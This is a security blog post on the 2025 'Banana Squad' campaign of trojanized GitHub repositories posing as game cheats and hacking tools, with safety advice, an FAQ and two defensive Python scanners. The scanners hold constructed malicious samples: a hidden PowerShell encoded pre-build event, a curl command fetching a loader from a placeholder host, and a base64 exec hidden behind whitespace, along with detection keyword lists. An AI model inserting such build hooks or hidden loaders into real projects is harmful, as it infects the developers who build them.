Trojanized GitHub Repositories Target Gamers and Developers in Massive Malware Campaign (2025)

More than 200 trojanized GitHub repositories targeting gamers and developers were discovered, spreading malware disguised as Python hacking tools and game cheats. This article explains how the campaign works, the risks it poses, and how to stay safe when downloading code from GitHub.


Introduction

In June 2025, security researchers exposed a widespread campaign targeting gamers and developers through trojanized GitHub repositories. Tracked as “Banana Squad” in ReversingLabs' report, this ongoing operation exploits the trust placed in open-source platforms by hiding backdoors inside fake Python-based tools. The end goal? Harvesting sensitive data, gaining persistent remote access, and compromising development environments.

This blog unpacks the tactics, tools, infection chains, and security lessons from this campaign—especially vital for cybersecurity enthusiasts, developers, and ethical hackers.

What Is the Banana Squad Campaign?

Banana Squad is a malicious campaign involving over 200 backdoored GitHub repositories. These repos impersonate legitimate tools, mostly Python hacking utilities, game cheats, and Discord account cleaners, but silently deliver malware payloads to the system of whoever runs them.

Origin

  • Initial discovery: 2023, as malicious packages on PyPI

  • Reignited in 2024 to 2025 using GitHub repositories

  • Disguised tools: Fortnite cheats, TikTok username checkers, PayPal bulk account checkers, Discord cleaners

How Do These Trojanized Repositories Work?

The threat actors upload repositories under popular, search-friendly names and inflate GitHub's visibility signals (stars, forks, watchers) to make them look established. These projects lure novice developers or gamers looking for modding tools or account utilities.

Infection Mechanism:

  1. Discovery: the user finds a promising GitHub repo with a healthy-looking star and fork count.

  2. Cloning/Download: the repo is cloned or downloaded onto the user's system.

  3. Code Execution: running a script, or building the project in Visual Studio (which happens as soon as you press Run), fires a hidden pre-build event.

  4. Malware Injection: malicious payloads are downloaded from attacker infrastructure and executed.

  5. Data Exfiltration: info-stealers collect credentials, tokens, and wallet keys and send them to attacker-controlled servers.

Types of Backdoors Found

Researchers identified four kinds of backdoor:

  1. Python Script Backdoors

    • Deliver information stealers and payload loaders

    • Target: Windows OS

  2. Visual Studio PreBuild Events

    • A command placed in the project's PreBuildEvent runs every time the project is built, before any code is compiled

    • Build events are a legitimate MSBuild feature, so a malicious one hides among normal build steps and fires on developer machines and CI/CD build agents alike

  3. Screensaver (.scr) Files

    • .scr files are ordinary Windows executables with a different extension, so double-clicking one runs it

    • Used to execute the attacker's loader directly on the victim's machine

  4. Malicious JavaScript Files

    • Serve as droppers for other RATs

    • Communicate via Telegram APIs
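The PreBuild technique above is mechanical enough to check for before you build anything. The following is an added example written for this article, not code from ReversingLabs, GitHub, or any repository in the campaign: it parses an MSBuild project file, lists every command the project would execute around compilation (PreBuildEvent and PostBuildEvent properties, and Exec tasks inside targets, including targets hooked in with BeforeTargets="Build"), and flags the ones containing substrings that rarely belong in an honest build step. SAMPLE_CSPROJ is constructed to mirror the technique, with a placeholder instead of a real encoded command, and SUSPICIOUS_TOKENS is an assumed, deliberately short list rather than a complete ruleset.

```python
"""Audit MSBuild project files for commands that run at build time.

Added example for this article; not code from ReversingLabs, GitHub, or any
repository in the campaign. SAMPLE_CSPROJ is constructed to mirror the
PreBuild technique described in the text, and SUSPICIOUS_TOKENS is an
assumed, deliberately short list rather than a complete detection ruleset.
"""
import xml.etree.ElementTree as ET

# Substrings that rarely belong in an honest build step (assumption).
SUSPICIOUS_TOKENS = (
    "powershell", "pwsh", "-enc", "-encodedcommand", "frombase64string",
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "curl ",
    "certutil", "bitsadmin", "mshta", "rundll32", "regsvr32",
    "http://", "https://", "%temp%", "%appdata%", "\\appdata\\",
)

# Properties that MSBuild turns into a command executed around compilation.
EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent"}


def _local(tag: str) -> str:
    """Drop the XML namespace so old-style (namespaced) and SDK-style projects match."""
    return tag.rsplit("}", 1)[-1]


def find_build_commands(project_xml: str) -> list[dict]:
    """Return every command the project would execute, in document order."""
    root = ET.fromstring(project_xml)
    commands = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in EVENT_TAGS and elem.text and elem.text.strip():
            commands.append({"where": name, "command": elem.text.strip()})
        elif name == "Target":
            # <Exec> inside a <Target> runs when the target does; BeforeTargets="Build"
            # makes it fire before any code is compiled.
            label = f"Target {elem.get('Name', '?')}"
            if elem.get("BeforeTargets"):
                label += f" (BeforeTargets={elem.get('BeforeTargets')})"
            for task in elem.iter():
                if _local(task.tag) == "Exec" and task.get("Command", "").strip():
                    commands.append({"where": label, "command": task.get("Command").strip()})
    return commands


def suspicious_tokens(command: str) -> list[str]:
    """Which watched substrings appear in the command (case-insensitive)."""
    low = command.lower()
    return [tok for tok in SUSPICIOUS_TOKENS if tok in low]


def audit_project(project_xml: str) -> list[dict]:
    """Build commands that contain at least one watched token."""
    findings = []
    for entry in find_build_commands(project_xml):
        hits = suspicious_tokens(entry["command"])
        if hits:
            findings.append({**entry, "hits": hits})
    return findings


# Constructed sample: an old-style project with two honest steps and two that
# stage a second-stage payload before the build, which is what a backdoored
# "cheat" project's pre-build event looks like. BASE64_PLACEHOLDER stands in
# for an encoded PowerShell command.
SAMPLE_CSPROJ = r"""<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -w hidden -ep bypass -enc BASE64_PLACEHOLDER</PreBuildEvent>
    <PostBuildEvent>echo Build finished</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Tools">
    <Exec Command="dotnet tool restore" />
  </Target>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="curl -s https://updates.example.invalid/loader.scr -o %TEMP%\loader.scr" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for f in audit_project(SAMPLE_CSPROJ):
        print(f"{f['where']}: {f['command']!r} -> {f['hits']}")
```

Run the same parser over every .csproj, .vbproj, .props and .targets file in the clone, not just the one you intend to open: MSBuild imports Directory.Build.props and Directory.Build.targets from parent directories automatically, so a command hidden there runs without appearing in the project file at all.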

Payloads Delivered

The campaign deployed a range of Remote Access Trojans (RATs) and info-stealers:

  • AsyncRAT

  • Remcos RAT

  • Lumma Stealer

  • Custom Java-based stealers

  • Exodus Wallet injectors

Each of these tools was designed to steal credentials, capture screenshots, record keystrokes, or gain remote access to infected systems.

Real-World Campaigns Using Similar Tactics

Stargazers Ghost Network (Check Point Research)

  • Hosted Minecraft mods that dropped Java-based stealers.

  • Used fake GitHub stars to boost repo credibility.

Water Curse Campaign (Trend Micro)

  • Found 76 GitHub repos distributing credential-stealing malware.

Sakura-RAT (Sophos)

  • Exploited GitHub-hosted code to infect malware developers themselves.

Key Indicators of Compromise (IOCs)

  • Repositories hosted under suspicious or throwaway GitHub accounts with no other credible history

  • Scripts that reach out to paste sites or messaging APIs at runtime (e.g., Pastebin, the Telegram Bot API)

  • A single committer e-mail address ([email protected]) recurring across many of the repositories

  • Unexpected PreBuildEvent/PostBuildEvent entries or Exec tasks in .csproj files (a .sln file only references projects and carries no build events itself)

  • Connections to attacker domains such as dieserbenni[.]ru
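Most of the indicators above can be checked against a local clone without executing anything. The following is an added example written for this article, not code from ReversingLabs or from any repository in the campaign: it flags executables bundled into a "Python tool" repo, scans source lines for references to the endpoints named above, for decode-then-execute idioms, and for code pushed off-screen by a long run of whitespace, and summarises `git log` output so that a single address committing everything on one day, or the same address showing up across several unrelated repos, stands out. The source snippet, the git log excerpts and the thresholds are constructed for the demonstration; WATCHED_HOSTS is an assumed short list (the two services named above plus the defanged IOC domain, re-fanged for matching), not a complete indicator set.

```python
"""Triage a cloned repository against the indicators listed above.

Added example for this article; not code from ReversingLabs or from any
repository in the campaign. The source snippet, the git log excerpts and the
thresholds are constructed for the demonstration; WATCHED_HOSTS is an assumed
short list, not a complete indicator set.
"""
import re
from collections import Counter

WATCHED_HOSTS = ("pastebin.com", "api.telegram.org", "dieserbenni.ru")

# File types that should not appear in a "Python tool" or "cheat" repository.
EXECUTABLE_EXTS = (".scr", ".exe", ".bat", ".cmd", ".vbs", ".hta", ".ps1")

# Decode-then-execute idioms seen in Python and JavaScript droppers.
EXEC_PATTERNS = (
    re.compile(r"\bexec\s*\(\s*(?:base64\.)?b64decode\b", re.I),
    re.compile(r"\bexec\s*\(\s*compile\s*\(", re.I),
    re.compile(r"\beval\s*\(\s*(?:atob|Buffer\.from)\s*\(", re.I),
    re.compile(r"\bnew Function\s*\(\s*atob\s*\(", re.I),
)
LONG_LINE = 300                              # assumption: likely hides code off-screen
HIDDEN_GAP = re.compile(r"\S[ \t]{80,}\S")   # code pushed right by a run of whitespace


def flag_filenames(paths):
    """Paths whose extension marks a native executable or script launcher."""
    return [p for p in paths if p.lower().endswith(EXECUTABLE_EXTS)]


def triage_source(path, text):
    """Per-line findings for one Python or JavaScript file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        where = f"{path}:{lineno}"
        if len(line) > LONG_LINE:
            findings.append(f"{where}: {len(line)}-character line (possible off-screen code)")
        if HIDDEN_GAP.search(line):
            findings.append(f"{where}: code hidden after a long run of whitespace")
        low = line.lower()
        findings.extend(f"{where}: reference to {h}" for h in WATCHED_HOSTS if h in low)
        if any(p.search(line) for p in EXEC_PATTERNS):
            findings.append(f"{where}: executes decoded data")
    return findings


def committer_profile(git_log):
    """Summarise `git log --format='%ae|%ad' --date=short` output for one repo."""
    emails, days = Counter(), Counter()
    for line in git_log.strip().splitlines():
        email, day = line.split("|", 1)
        emails[email.strip().lower()] += 1
        days[day.strip()] += 1
    total = sum(emails.values())
    return {
        "commits": total,
        "emails": dict(emails),
        "single_author": len(emails) == 1,
        # 1.0 means every commit landed on one day: bulk-published, not developed.
        "busiest_day_share": days.most_common(1)[0][1] / total,
    }


def shared_committers(profiles):
    """E-mail addresses that appear in more than one supposedly unrelated repo."""
    seen = {}
    for repo, prof in profiles.items():
        for email in prof["emails"]:
            seen.setdefault(email, []).append(repo)
    return {e: repos for e, repos in seen.items() if len(repos) > 1}


# Constructed sample: a "TikTok username checker" with a payload parked far to
# the right of an innocuous line, plus a Telegram Bot API reporting endpoint.
# The base64 blob decodes to the harmless string "import os".
SAMPLE_PY = "\n".join([
    "import base64, requests",
    "REPORT = 'https://api.telegram.org/bot<TOKEN>/sendDocument'",
    "def check_username(name):",
    "    return requests.get(f'https://www.tiktok.com/@{name}').status_code == 200",
    "print('checker ready')" + " " * 120 + "; exec(base64.b64decode('aW1wb3J0IG9z'))",
])

# Constructed `git log` excerpts: two lures pushed by one address in one sitting
# each, and a normally developed project for contrast.
LOG_LURE_A = "dev@example.invalid|2025-05-30\n" * 3
LOG_LURE_B = "dev@example.invalid|2025-05-31\n" * 2
LOG_NORMAL = ("alice@example.invalid|2024-01-10\nbob@example.invalid|2024-03-02\n"
              "alice@example.invalid|2024-06-18\n")

if __name__ == "__main__":
    for finding in triage_source("checker.py", SAMPLE_PY):
        print(finding)
    print(flag_filenames(["checker.py", "assets/Installer.scr", "README.md"]))
    profiles = {name: committer_profile(log) for name, log in
                [("fortnite-cheat", LOG_LURE_A), ("discord-cleaner", LOG_LURE_B), ("legit-tool", LOG_NORMAL)]}
    print(shared_committers(profiles))
```

The whitespace check matters because GitHub's file view does not wrap long lines by default: a payload placed after a few hundred spaces is invisible in the browser and only shows up when you read the raw file or search it. Treat the host list as a starting point and add whatever your own telemetry shows; the exec-pattern list likewise catches the common idioms, not every obfuscation.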

How to Stay Safe: GitHub Security Tips

  • Prefer official sources: be wary of repositories with suspicious origins, vague documentation, or no release history.

  • Review the code before execution: read the .py, .js, and .csproj files, including build events, for hidden payloads before running or building anything.

  • Verify repository history: look at committers, contributors, commit dates, and issue discussions; a wall of stars with no real issues or pull requests is a warning sign.

  • Use a sandbox or VM for testing: keep unverified code off your host machine and away from your real credentials.

  • Apply endpoint protection and sandboxing tools: they can detect and block malicious behaviour early, but treat them as a backstop, not a substitute for review.

Conclusion

This campaign underscores the dark side of open-source ecosystems when trust is granted but never verified. GitHub is increasingly used as a Distribution-as-a-Service (DaaS) platform by cybercriminals who exploit community trust and software reuse.

For developers and gamers alike, being aware is not enough—we must vet, validate, and verify every tool we use.

Frequently Asked Questions (FAQs)

What is a trojanized GitHub repository?

A trojanized GitHub repository is a seemingly legitimate project that hides malicious code or scripts, designed to infect systems or steal data.

How are developers being targeted through GitHub?

Cybercriminals upload fake tools and libraries that execute malware when developers clone or run the code.

What is the Banana Squad campaign?

It’s a 2025 malware operation that posted over 200 trojanized repositories on GitHub to infect gamers and developers.

Why do hackers use GitHub for malware distribution?

GitHub is trusted by developers. Malware embedded in public code spreads easily and often goes unnoticed.

What kind of malware was used in the Banana Squad operation?

Mainly info-stealers and remote access trojans like AsyncRAT, Remcos, and Lumma Stealer.

Which platforms are being targeted by this campaign?

Windows systems used by gamers and developers are the primary targets.

Are all GitHub projects safe?

No. Always verify the source, contributors, and activity before using any project.

How can I tell if a GitHub repo is malicious?

Look for mismatches: many stars but no issues or pull requests, commits all made on the same day, a single unknown committer, scripts that make unexplained network connections, or build events in project files.

What did the malware target?

Accounts and client data for services such as Discord, PayPal, TikTok, and Steam, as well as cryptocurrency wallets such as Exodus.

Can antivirus software detect this malware?

Some can, but many payloads are obfuscated or polymorphic, making them hard to detect.

What’s the role of fake GitHub stars in malware campaigns?

They falsely increase repo credibility to mislead users into trusting the content.

How do backdoors get injected in GitHub code?

They’re often hidden in Python scripts, pre-build Visual Studio events, or scripts that auto-run.

What is a PreBuild backdoor?

A malicious script that runs automatically when a project is built or compiled in Visual Studio.

What other campaigns are similar to Banana Squad?

Water Curse, Stargazers Ghost Network, and Sakura-RAT campaigns also used GitHub for malware delivery.

What should I do if I downloaded a suspicious GitHub project?

Disconnect from the internet, run a deep malware scan, and restore from a clean backup if needed. Because these payloads are info-stealers, also rotate every credential, API token, session cookie, and wallet key that was on the machine; assume they were exfiltrated the moment the code ran.

Can GitHub remove malicious repositories?

Yes, once flagged, GitHub takes action to remove harmful content and disable associated accounts.

How do malware campaigns use YouTube and Discord?

They post fake tutorials and links to the trojanized GitHub repositories to trap users.

Are gamers the only targets?

No, although gamers are common targets, developers and even cybersecurity researchers are at risk.

How do I verify a GitHub repository’s authenticity?

Check contributors, commit history, issue responses, and recent activity. Trust only verified sources.

Is GitHub doing anything to fight malware?

GitHub uses automated scans and community reporting but the volume makes it challenging.

What is an info-stealer?

A type of malware designed to steal personal information like credentials, tokens, and wallet data.

Why are open-source developers being targeted?

Because they rely on shared codebases, making them vulnerable to backdoored dependencies.

How do Visual Studio PreBuild scripts execute malware?

They run code before compilation, allowing malware to be executed silently.

What are DaaS platforms in cybersecurity?

DaaS or Distribution-as-a-Service platforms distribute malware tools for cybercriminal operations.

What is the danger of modifying GitHub code blindly?

It may execute embedded scripts or activate malware unintentionally.

How can I report a suspicious GitHub repo?

Use the "Report content" button on GitHub or contact GitHub support directly.

Can I get hacked just by cloning a GitHub repo?

Not normally. A plain clone writes files but does not execute anything from the repository (Git hooks live in .git/hooks and are not transferred by a clone). The risk starts when you run a script, build the project (pre-build events fire), or double-click a bundled file such as a .scr.

What are safe practices when using GitHub code?

Use sandboxing, read code before running, scan for malware, and verify contributor reputations.

Why do threat actors use themes like gaming cheats?

These themes attract high traffic and less cautious users who don’t verify code sources.

Is malware on GitHub a new trend?

No, but it has escalated significantly with sophisticated campaigns and fake credibility signals.

What tools can help scan GitHub repositories?

Static analysis such as GitHub Advanced Security code scanning and SonarQube can flag suspicious patterns, and supply-chain scanners such as those from ReversingLabs analyse packages for malicious behaviour. None of them replaces reading the scripts and build configuration yourself.
